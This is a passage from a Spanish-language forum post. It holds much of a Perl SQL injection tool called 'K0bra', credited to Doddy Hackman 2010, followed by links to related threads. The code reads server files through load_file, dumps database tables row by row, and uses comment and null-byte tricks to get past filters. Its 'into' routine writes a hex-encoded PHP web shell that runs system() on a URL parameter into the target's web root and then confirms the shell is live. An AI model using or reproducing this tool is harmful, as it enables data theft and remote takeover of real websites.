  517. savefile($_[3].".txt","[Column Found] : $columns");
  518. }
  519. }
  520. } else {
  521. print "\n[Example] : $0 http://127.0.0.1/tester/sql.php?id=-1+union+select+hackman,2,3 hackers\n\n"; &copyright;
  522. }
  523. }
  524.  
  525. sub load {
  526. savefile($_[2].".txt","\n");
  527. print "\n";
  528. ($pass1,$pass2) = &bypass($_[1]);
  529. if ($_[0] =~/(.*)hackman(.*)/g) {
  530. print "\n[+] Searching files with load_file...\n\n\n";
  531. my $start = $1; my $end = $2;
  532. for my $file(@files) {
  533. chomp $file;
  534. $concat = "unhex(hex(concat(char(107,48,98,114,97),load_file(".encode($file)."),char(107,48,98,114,97))))";
  535. my $code = toma($start.$concat.$end.$pass2);
  536. chomp $code;
  537. if ($code=~/k0bra(.*)k0bra/s) {
  538. print "[File Found] : $file\n";
  539. print "\n[Source Start]\n\n";
  540. print $1;
  541. print "\n\n[Source End]\n\n";
  542. savefile($_[2].".txt","[File Found] : $file");
  543. savefile($_[2].".txt","\n[Source Start]\n");
  544. savefile($_[2].".txt","$1");
  545. savefile($_[2].".txt","\n[Source End]\n");
  546. }}}}
  547.  
  548. sub loadfile {
  549. savefile($_[2].".txt","\n");
  550. ($pass1,$pass2) = &bypass($_[1]);
  551. if ($_[0] =~/(.*)hackman(.*)/g) {
  552. my $start = $1; my $end = $2;
  553. print "\n\n[+] File to read : ";
  554. chomp (my $file = <stdin>);
  555. $concat = "unhex(hex(concat(char(107,48,98,114,97),load_file(".encode($file)."),char(107,48,98,114,97))))";
  556. my $code = toma($start.$concat.$end.$pass2);
  557. chomp $code;
  558. if ($code=~/k0bra(.*)k0bra/s) {
  559. print "[File Found] : $file\n";
  560. print "\n[Source Start]\n\n";
  561. print $1;
  562. print "\n\n[Source End]\n\n";
  563. savefile($_[2].".txt","[File Found] : $file");
  564. savefile($_[2].".txt","\n[Source Start]\n");
  565. savefile($_[2].".txt","$1");
  566. savefile($_[2].".txt","\n[Source End]\n");
  567. }}}
  568.  
  569. sub dump {
  570. savefile($_[5].".txt","\n");
  571. print "\n";
  572. my $page = $_[0];
  573. ($pass1,$pass2) = &bypass($_[4]);
  574. if ($page=~/(.*)hackman(.*)/){
  575. my $start = $1;
  576. my $end = $2;
  577. print "[+] Extracting values...\n\n";
  578. $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
  579. $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
  580. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
  581. if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
  582. $tota = $1;
  583. print "[+] Table : $_[3]\n";
  584. print "[+] Length of the rows : $tota\n\n";
  585. print "[$_[1]] [$_[2]]\n\n";
  586. savefile($_[5].".txt","[Table] : $_[3]");
  587. savefile($_[5].".txt","[+] Length of the rows: $tota\n");
  588. savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
  589. for my $limit(0..$tota) {
  590. chomp $limit;
  591. $injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
  592. if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
  593. savefile($_[5].".txt","[$_[1]] : $1   [$_[2]] : $2");
  594. print "[$_[1]] : $1   [$_[2]] : $2\n";
  595. } else {
  596. print "\n\n[+] Extracting Finish\n";
  597. &reload;
  598. }
  599. }
  600. } else {
  601. print "[-] Not Found any DATA\n\n";
  602. }}}
  603.  
  604.  
  605. sub into {
  606. print "\n\n[Status] : Injecting a SQLI for create a shell\n\n";
  607. my ($page,$bypass,$dir,$save) = @_;
  608. savefile($save.".txt","\n");
  609. print "\n";
  610. ($pass1,$pass2) = &bypass($bypass);
  611. my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
  612. if ($path=~/\/(.*)$/) {
  613. my $path1 = $1;
  614. my $path2 = $path1;
  615. $path2 =~s/$1//;
  616. $dir =~s/$path1//ig;
  617. $shell = $dir."/"."shell.php";
  618. if ($page =~/(.*)hackman(.*)/ig) {
  619. my  ($start,$end) = ($1,$2);
  620. $code = toma($start."0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e".$end.$pass1."into".$pass1."outfile".$pass1."'".$shell."'".$pass2);
  621. $code1 = toma("http://".$auth."/".$path2."/"."shell.php");
  622. if ($code1=~/Mini Shell By Doddy/ig) {
  623. print "[shell up] : http://".$auth."/".$path2."/"."shell.php"."\a\a";
  624. savefile($save.".txt","[shell up] : http://".$auth."/".$path2."/"."shell.php");
  625. } else {
  626. print "[shell] : Not Found\n";
  627. }
  628. }
  629. }
  630. }
  631.  
  632. sub encode {
  633. my $string = $_[0];
  634. $hex = '0x';
  635. for (split //,$string) {
  636. $hex .= sprintf "%x", ord;
  637. }
  638. return $hex;
  639. }
  640.  
  641. sub decode {
  642. $_[0] =~ s/^0x//;
  643. $encode = join q[], map { chr hex } $_[0] =~ /../g;
  644. return $encode;
  645. }
  646.  
  647. sub bypass {
  648. if ($_[0] eq "/*") { return ("/**/","/**/"); }
  649. elsif ($_[0] eq "%20") { return ("%20","%00"); }
  650. else {return ("+","--");}}
  651.  
  652. sub ascii {
  653. return join ',',unpack "U*",$_[0];
  654. }
  655.  
  656. sub ascii_de {
  657. $_[0] = join q[], map { chr } split q[,],$_[0];
  658. return $_[0];
  659. }
  660.  
  661.  
  662. sub finish {
  663. &copyright;
  664. <STDIN>;
  665. exit(1);
  666. }
  667.  
  668. sub installer {
  669. unless (-d "/logs/webs") {
  670. mkdir("logs/",777);
  671. mkdir("logs/webs/",777);
  672. }
  673. }
  674.  
  675. sub copyright {
  676. print "\n\n\n\n(C) Doddy Hackman 2010\n\n";
  677. }
  678.  
  679. sub toma {
  680. return $nave->get($_[0])->content;
  681. }
  682.  
  683. sub savefile {
  684. open (SAVE,">>logs/webs/".$_[0]);
  685. print SAVE $_[1]."\n";
  686. close SAVE;
  687. }
  688.  
  689. sub finish {
  690. print "\n\n\n(C) Doddy Hackman 2010\n\n";
  691. <STDIN>;
  692. exit(1);
  693. }
  694.  
  695.  
  696. # The End ?
  697.  


« Última modificación: 1 Diciembre 2011, 22:18 pm por Doddy » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Perl] K0bra 0.5
Scripting
BigBear 0 1,577 Último mensaje 10 Octubre 2011, 16:53 pm
por BigBear
[Python] K0bra 0.3
Scripting
BigBear 0 1,392 Último mensaje 3 Diciembre 2011, 16:35 pm
por BigBear
[Ruby] k0bra 0.3
Scripting
BigBear 0 1,888 Último mensaje 16 Febrero 2012, 18:16 pm
por BigBear
[Perl] K0bra 1.6
Scripting
BigBear 0 762 Último mensaje 14 Julio 2012, 19:38 pm
por BigBear
[Delphi] K0bra 1.0
Programación General
BigBear 0 918 Último mensaje 26 Mayo 2013, 02:15 am
por BigBear
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines